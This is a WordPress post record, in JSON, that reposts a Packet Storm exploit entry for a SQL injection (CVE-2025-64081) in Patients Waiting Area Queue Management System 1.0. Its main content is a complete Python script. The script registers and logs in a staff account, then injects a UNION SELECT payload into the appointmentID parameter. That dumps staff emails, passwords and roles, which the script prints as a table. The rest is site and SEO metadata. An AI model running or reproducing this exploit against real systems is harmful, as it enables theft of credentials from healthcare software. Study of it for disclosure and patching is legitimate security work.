{"id":26123,"date":"2025-11-13T10:49:32","date_gmt":"2025-11-13T10:49:32","guid":{"rendered":"http:\/\/localhost\/?p=26123"},"modified":"2025-11-13T10:49:32","modified_gmt":"2025-11-13T10:49:32","slug":"patients-waiting-area-queue-management-system-10-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=26123","title":{"rendered":"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592"},"content":{"rendered":"

{“lastseen”:”2025-11-13T16:17:13″,”description”:”Patients………………………………”,”published”:”2025-11-13T00:00:00″,”modified”:”2025-11-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211592″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64081″],”sourceData”:”# Exploit Title: Patients Waiting Area Queue Management System v1.0 – SQL Injection\\n # Exploit Author: Deva Parekh (pr0f)\\n # Date: October 23, 2025\\n # Vendor Homepage: https:\/\/www.sourcecodester.com\/php\/18348\/patients-waiting-area-queue-management-system.html\\n # Software Link: https:\/\/www.sourcecodester.com\/download-code?nid=18348\\u0026title=+Patients+Waiting+Area+Queue+Management+System\\n # Tested on: Kali Linux, Apache, Mysql\\n # Vendor: sourcecodester\\n # Version: v1.0\\n # Exploit Description:\\n # Patients Waiting Area Queue Management System v1.0 suffers from an SQL Injection that allows an attacker dump contents from the database.\\n \\n import requests, json, sys\\n from typing import Sequence, Iterable\\n \\n def _to_cell_str(value) -\\u003e str:\\n if value is None:\\n return \\”\\”\\n s = str(value)\\n return \\” \\”.join(s.splitlines())\\n \\n def _format_cell(text: str, width: int, align: str) -\\u003e str:\\n if align == \\”right\\”:\\n return text.rjust(width)\\n if align == \\”center\\”:\\n return text.center(width)\\n return text.ljust(width)\\n \\n def print_table(rows: Iterable[Sequence], headers: Sequence = None,\\n align: Sequence[str] = None, padding: int = 1):\\n rows = [list(map(_to_cell_str, r)) for r in rows]\\n ncols = max((len(r) for r in rows), default=0)\\n if headers:\\n headers = list(map(_to_cell_str, headers))\\n ncols = max(ncols, len(headers))\\n \\n for r in rows:\\n if len(r) \\u003c ncols:\\n r.extend([\\”\\”] * (ncols – len(r)))\\n if headers and len(headers) \\u003c ncols:\\n headers.extend([\\”\\”] * (ncols – len(headers)))\\n \\n if not align:\\n aligns = [\\”left\\”] * ncols\\n else:\\n aligns = list(align)\\n if len(aligns) \\u003c ncols:\\n aligns.extend([aligns[-1]] * (ncols – len(aligns)))\\n \\n \\n col_widths = [0] * ncols\\n for col in range(ncols):\\n if headers:\\n col_widths[col] = max(col_widths[col], len(headers[col]))\\n for r in rows:\\n col_widths[col] = max(col_widths[col], len(r[col]))\\n \\n pad = \\” \\” * padding\\n \\n def make_sep():\\n parts = [\\”+\\”]\\n for w in col_widths:\\n parts.append(\\”-\\” * (w + padding * 2))\\n parts.append(\\”+\\”)\\n return \\”\\”.join(parts)\\n \\n sep = make_sep()\\n \\n print(sep)\\n if headers:\\n parts = [\\”|\\”]\\n for i in range(ncols):\\n parts.append(pad + _format_cell(headers[i], col_widths[i], aligns[i]) + pad)\\n parts.append(\\”|\\”)\\n print(\\”\\”.join(parts))\\n print(sep)\\n \\n for r in rows:\\n parts = [\\”|\\”]\\n for i in range(ncols):\\n parts.append(pad + _format_cell(r[i], col_widths[i], aligns[i]) + pad)\\n parts.append(\\”|\\”)\\n print(\\”\\”.join(parts))\\n print(sep)\\n \\n def register_user(session, user):\\n headers = {‘Content-Type’ : ‘application\/json’}\\n session.post(f’http:\/\/{target}\/php\/api_register_staff.php’, json=user, headers=headers)\\n \\n def login(session, user):\\n headers = {‘Content-Type’ : ‘application\/x-www-form-urlencoded’}\\n payload = f’email={user[’email’]}\\u0026password={user[‘password’]}’\\n session.post(f’http:\/\/{target}\/php\/api_register_staff.php’, data=payload, headers=headers)\\n \\n def exploit_sqli(session):\\n sql_payload = \\”5′ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,id,email,NULL,password,NULL,NULL,NULL,NULL,NULL,first_name,last_name,role,NULL,is_active from staff– \\”\\n rep = session.get(f’http:\/\/{target}\/php\/api_patient_schedule.php?appointmentID={sql_payload}’, allow_redirects=False)\\n return json.loads(rep.content.decode(\\”utf-8\\”).rstrip())\\n \\n def convert_to_row(dump):\\n rows = [(a[‘time’], a[‘doctor’], a[‘appointment_date’], a[‘reason’], a[‘fullname’], a[‘appointment’]) for a in dump[‘appointment’]]\\n return rows\\n \\n def print_sig():\\n print(”)\\n print(‘\u250f\u2501\u2513\u250f\u2501\u2513\u250f\u2501\u2513\u250f\u2501\u2578’)\\n print(‘\u2523\u2501\u251b\u2523\u2533\u251b\u2503\u2503\u2503\u2523\u2578 ‘)\\n print(‘\u2579 \u2579\u2517\u2578\u2517\u2501\u251b\u2579 ‘)\\n print(‘~ https:\/\/github.com\/pr0f94’)\\n print(‘~ Patients Waiting Area Queue Management System v1 – union sqli’)\\n print(”)\\n \\n if __name__ == \\”__main__\\”:\\n headers = [\\”id\\”, \\”first_name last_name\\”, \\”email\\”, \\”password\\”, \\”role\\”, \\”is_active\\”]\\n user = {\\”firstName\\”:\\”pr0f\\”,\\”lastName\\”:\\”pr0f\\”,\\”email\\”:\\”pr0f@hotmail.com\\”,\\”password\\”:\\”getr3kt\\”,\\”role\\”:\\”doctor\\”}\\n \\n print_sig()\\n \\n target = sys.argv[1]\\n s = requests.Session()\\n \\n print(‘– Registering new user’)\\n register_user(s, user)\\n print(‘– Logging in as user’)\\n login(s, user)\\n print(‘– Exploiting sqli to dump staff table’)\\n table_dump = exploit_sqli(s)\\n rows = convert_to_row(table_dump)\\n print(”)\\n print_table(rows, headers=headers)”,”sourceHref”:”https:\/\/packetstorm.news\/download\/211592″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211592\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-11-13T16:17:13″,”description”:”Patients………………………………”,”published”:”2025-11-13T00:00:00″,”modified”:”2025-11-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211592″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64081″],”sourceData”:”# Exploit Title: Patients Waiting Area Queue Management System v1.0 – SQL Injection\\n # Exploit Author:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-26123","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=26123\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-11-13T16:17:13″,”description”:”Patients………………………………”,”published”:”2025-11-13T00:00:00″,”modified”:”2025-11-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211592″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64081″],”sourceData”:”# Exploit Title: Patients Waiting Area Queue Management System v1.0 – SQL Injectionn # Exploit Author:...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=26123\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-13T10:49:32+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26123#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26123\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592\",\"datePublished\":\"2025-11-13T10:49:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26123\"},\"wordCount\":846,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26123#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26123\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26123\",\"name\":\"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-13T10:49:32+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26123#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=26123\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=26123#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=26123","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592 - zero redgem","og_description":"{“lastseen”:”2025-11-13T16:17:13″,”description”:”Patients………………………………”,”published”:”2025-11-13T00:00:00″,”modified”:”2025-11-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:211592″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-64081″],”sourceData”:”# Exploit Title: Patients Waiting Area Queue Management System v1.0 – SQL Injectionn # Exploit Author:...","og_url":"https:\/\/zero.redgem.net\/?p=26123","og_site_name":"zero redgem","article_published_time":"2025-11-13T10:49:32+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=26123#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=26123"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592","datePublished":"2025-11-13T10:49:32+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=26123"},"wordCount":846,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=26123#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=26123","url":"https:\/\/zero.redgem.net\/?p=26123","name":"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-13T10:49:32+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=26123#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=26123"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=26123#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Patients Waiting Area Queue Management System 1.0 SQL Injection_PACKETSTORM:211592"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26123","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=26123"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/26123\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=26123"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=26123"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=26123"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}